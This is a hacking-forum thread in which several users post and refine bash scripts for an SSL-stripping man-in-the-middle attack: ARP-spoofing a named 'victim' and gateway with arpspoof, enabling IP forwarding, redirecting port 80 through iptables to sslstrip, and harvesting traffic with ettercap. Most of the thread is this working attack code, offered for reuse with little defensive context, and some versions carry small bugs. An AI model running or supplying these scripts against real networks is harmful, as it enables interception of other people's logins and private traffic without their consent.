SSL sniffing script

[davos1]

I made a script for SSL sniffing as per g0tmilk's howto here: forums.remote-exploit.org/backtrack-4-howto/24426-video-tutorial-how-crack-snifff-ssl-https-sslstrip.html#post141532 .

I'm not new to linux, but new to BackTrack. This is the first shell script that I ever made. Feedback would be GREATLY appreciated.

Note: To use properly, you first have to uncoment 2 lines in /etc/etter.conf (the redir_command_on and redir_command_off lines for iptables).

Code:

#!/bin/bash
clear
echo "Hello $USER!"
echo "Welcome to the SSL sniffing script"
clear
echo "What's the interface you'll be using? [eth0]"
read iface
if [ "$iface" = "" ]
then
iface="eth0"
fi
clear
echo "What's the target's IP?"
read tip
clear
echo "What's the target's gateway? [192.168.1.1]"
read tdg
if [ "$tdg" = "" ]
then
tdg="192.168.1.1"
fi
clear
echo "The selected interface is $iface"
echo "The target IP is $tip"
echo "The target gateway is $tdg"
echo "I'm ready to run the script."
echo "Are you sure you want to run it [y/n]?"
read yn
if [ "$yn" != "y" ]
then
echo "Exiting..."
echo "Have a nice day :)"
exit 0
fi
clear
echo "Running..."
echo 1 > /proc/sys/net/ipv4/ip_forward
konsole -e arpspoof -i $iface -t $tip $tdg &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
konsole -e  sslstrip -a -k -f &
clear
echo "Running ettercap"
ettercap -T -q -i $iface
clear
echo "All cleaned up."
echo "Have a nice day :)"

Hope this helps!

[Deadboy]

nicely done. thanks!

[floyd]

remove at least the

Code:

echo "All cleaned up."

because the system isn't cleaned up, you still have ip_forwarding enabled

haven't tried the script

[Jimmy Kane]

But you don't have to uncomment the 2 lines!!!!
then you would have ettercap forwarding the packets!!!
When you uncomment the forwarding of ettercap then ettercap disables the ip forwarding of the kernel (it is in the manual) ...
Ok? and don't forget to run ettercap in unoffensive mode ( -u arg)....

Very good script by the way!!!

[Nick_the_Greek]

Well done Jimmy Kane

Keep scripting and sharing

BTW Welcome to the forums

Nick

[thims]

@davos1: Very nice script man, keep up the good work, and contributing.
You most likely chose "konsole" so it launches those in there own terminals so you can view output, but just sort of a note(you might already know about it) but the nohup command could be used in place of konsole for use if you were not running a graphical environment.

I would like to contribute the script I use for SSL sniffing, with contributing this I am not trying to start a "competition" or anything simply sharing open source code, in the mentality of open source.(lets all share and improve each others code) There are some issues I plan to address with this script, and many improvements I want to address. In the current state it executes correctly and is capable of grabbing the appropriate data. Please let me know of *any* issues you have with it, ideas, improvements, etc.All feedback is constructive feedback.

General usage: sslsniff.sh -v <ip of target> -g <network gateway>
-v, and -g, are required however -s is optional, if excluded sslsniff defaults to port 10000.
Also note still required to edit etter.conf manually(plan to change that in the future)

Code:

#!/bin/bash
#
# Synopsis: A program to sniff traffic in an SSL connection
# Author:   thims (thims DOT local AT gmail DOT com)
# Version:  0.2
# Date:     20091107
# Comments: 
#   ToDO:
#         - Create section that edits iptables rules in /etc/etter.conf   


# leave blank simply here for coding style
victim=
gateway=
sslPort=10000

# print help
function help() {
cat << EOF
Usage: $0 [args] host
    -h, --help     -  Print this help and exit
    -v, --victim   -  IP address of desired host
    -g, --gateway  -  IP address of network gateway
    -s, --sslport  -  Desired port for sslstrip
EOF
}

# echo supplied argument and die
function die() {
  if [ -n "$1" ] ;then
    echo "$1"
  fi  
  exit 1
}

# nohup wrapper to check if specified program will execute correctly
function noHup() {
  cmd="$1"
  nohup $cmd > /dev/null &> /dev/null &
  sleep 5
  # here simply to handle sslstrip because it is ran by python it throws off pidof
  if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
    pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
  else
    pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
  fi  

  if [ -z "$pid" ] ;then
    return 1
  else
    return 0
  fi  
}

# poison the arp
function spoofMac() {
  echo -n "Poisoning the victim...."
  noHup "arpspoof -t "$victim" "$gateway""
  if [ $? -gt 0 ] ;then
    die "Error: could not initiate arpspoof. Dieing..."
  fi  
  echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
  echo "Ok"
}

# intercept the SSL cert
function sslInit() {
  echo -n "Setting up SSL intercept...."
  echo 1 > /proc/sys/net/ipv4/ip_forward
  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
  noHup "sslstrip -a -f -k -l "$sslPort""
  if [ $? -gt 0 ] ;then
    die "Error: could not initiate sslstrip. Dieing..."
  fi  
  echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
  echo "Ok"
}

# capture the responses
function capture() {
  echo -n "Starting to sniff...."
  ettercap -T -q
}

# clean up enviroment
function cleanUp() {
  echo "Cleaning up...."
  echo -n "Closing SSL proxy...."
  kill $(cat /var/run/sslsniff.sslstrip.run)
  rm /var/run/sslsniff.sslstrip.run
  echo "Ok"
  echo -n "Unpoisoning the victim...."
  kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
  rm /var/run/sslsniff.arpspoof.run
  echo "Ok"
  echo -n "Removing iptables rule and ip_forwarding...."
  iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
  echo 0 > /proc/sys/net/ipv4/ip_forward
  echo "Ok"
  echo "Have a nice day!"
}

# initialize the whole shebang
function initialize() {
  if [ -z "$victim" ] || [ -z "$gateway" ] ;then
    help
    echo
    die "Error: a syntactical one"
  else
    spoofMac
    sslInit
    capture
    cleanUp
  fi
}


# some CLI ARGS?
while [ $1 -gt 0 ]
do
  case "$1" in
    "-h"|"--help")
      help
      die
    ;;
    "-v"|"--victim")
      victim="$2"
    ;;
    "-g"|"--gw")
      gateway="$2"
    ;;
    "-s"|"--sslport")
      sslPort="$1"
    ;;
    '')
      help
      echo
      die "Error: a syntactical one"
    ;;
    -*)
      help
      echo
      die "Error: a syntactical one"
    ;;
  esac
  shift
done


# main loop

[Nick_the_Greek]

thims,

Very nice script.

I already got some ideas from it. I love this one:

Quote:

pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')

Quote:

...lets all share and improve each others code....

100% agree. After all linux is sharing.

Quote:

with contributing this I am not trying to start a "competition" or anything

Why don't you start a new post? It may be consider this as a hijacking.(?) Don't know.

One idea from me is to upload it to mediafire or whatever so we don't have to come here every-time and copy-paste etc.

Keep scripting and sharing.

(Please don't get bored soon.I personally keep my eyes on your scripts.)

Nick

[Jimmy Kane]

A little more improvement
- taking the -i or --iface argument for choosing the interface cause arpspoof wont work if you don't run with the -i arg ....
- Printing the details of your configuration and i have put a small cat /proc/sys/net/ipv4/ip_forward due to reasons that sometimes echo 1 > /proc/sys/net/ipv4/ip_forward wont work ( i don't know why )

Code:

#!/bin/bash
#
# Synopsis: A program to sniff traffic in an SSL connection
# Author:   thims (thims DOT local AT gmail DOT com)
# Version:  0.2
# Date:     20091107
# Comments: 
#   ToDO:
#         - Create section that edits iptables rules in /etc/etter.conf   


# leave blank simply here for coding style
victim=
gateway=
sslPort=10000

# print help
function help() {
cat << EOF
Usage: $0 [args] host
    -h, --help     -  Print this help and exit
    -i, --iface    -  Select the interface
    -v, --victim   -  IP address of desired host
    -g, --gateway  -  IP address of network gateway
    -s, --sslport  -  Desired port for sslstrip
EOF
}

# echo supplied argument and die
function die() {
  if [ -n "$1" ] ;then
    echo "$1"
  fi  
  exit 1
}

# nohup wrapper to check if specified program will execute correctly
function noHup() {
  cmd="$1"
  nohup $cmd > /dev/null &> /dev/null &
  sleep 5
  # here simply to handle sslstrip because it is ran by python it throws off pidof
  if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
    pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
  else
    pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
  fi  

  if [ -z "$pid" ] ;then
    return 1
  else
    return 0
  fi  
}

# poison the arp
function spoofMac() {
  echo -n "Poisoning the victim...."
  noHup "arpspoof -i "$iface" -t "$victim" "$gateway""
  if [ $? -gt 0 ] ;then
    die "Error: could not initiate arpspoof. Dieing..."
  fi  
  echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
  echo  "Ok"
}

# intercept the SSL cert
function sslInit() {
  echo -n "Setting up SSL intercept...."
  echo "1" > /proc/sys/net/ipv4/ip_forward
  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
  noHup "sslstrip -a -f -k -l "$sslPort""
  if [ $? -gt 0 ] ;then
    die "Error: could not initiate sslstrip. Dieing..."
  fi  
  echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
  cat -n "Forwarding:" /proc/sys/net/ipv4/ip_forward
  echo "Ok"
}

# capture the responses
function capture() {
  echo -n "Starting to sniff...."
  ettercap -T -q -i "$iface"
}

# clean up enviroment
function cleanUp() {
  echo "Cleaning up...."
  echo -n "Closing SSL proxy...."
  kill $(cat /var/run/sslsniff.sslstrip.run)
  rm /var/run/sslsniff.sslstrip.run
  echo "Ok"
  echo -n "Unpoisoning the victim...."
  kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
  rm /var/run/sslsniff.arpspoof.run
  echo "Ok"
  echo -n "Removing iptables rule and ip_forwarding...."
  iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
  echo 0 > /proc/sys/net/ipv4/ip_forward
  echo "Ok"
  echo "Have a nice day!"
}

# initialize the whole shebang
function initialize() {
  if [ -z "$victim" ] || [ -z "$gateway" ] || [ -z "$iface" ];then
    help
    echo
    die "Error: a syntactical one1"
  else
    echo "Victim:         " "$victim" "  Ok!"
    echo "Gateway/Router: " "$gateway" "  OK!"
    echo "Interface:          " "$iface" "    OK!"
    echo "SSLStrip on:       "	"$sslPort" "     OK!"
    spoofMac
    sslInit
    capture
    cleanUp
  fi
}


# some CLI ARGS?
while [ $# -gt 0 ]
do
  case "$1" in
    "-h"|"--help")
      help
      die
    ;;
    "-v"|"--victim")
      victim="$2"
    ;;
    "-g"|"--gw")
      gateway="$2"
    ;;
    "-s"|"--sslport")
      sslPort="$1"
    ;;
    "-i"|"--iface")
      iface="$2"
    ;;
    '')
      help
      echo
      die "Error: a syntactical one"
    ;;
    -*)
      help
      echo
      die "Error: a syntactical one"
    ;;
  esac
  shift
done


# main loop
initialize

Greeting's

[thims]

@nick_the_greek: thank you, I would like to think bash one-liners is my specialty(maybe just my interest, /me shrugs). Yeah I thought about posting a new thread, but at the time I couldnt being a new account, and I debated whether it would be a duplicate thread or a hijacking. I will probably create a new thread because I have made some changes already and incorporated a few new nice features. Also I just created a mediafire account good call. I will keep sharing, have any suggestions? all suggestions are def. welcome.

@jimmy Kane: Thank you, nice suggestions btw, I saw your email was just procrastinating a bit. I added the iface option and am looking into the ip_forward issue, I havent quite got a replica of the issue yet, care to provide more details on it? I might just end up adding some error correction for when it sets up the ip_forward.

Note: when I create the new thread I will link to it from this post.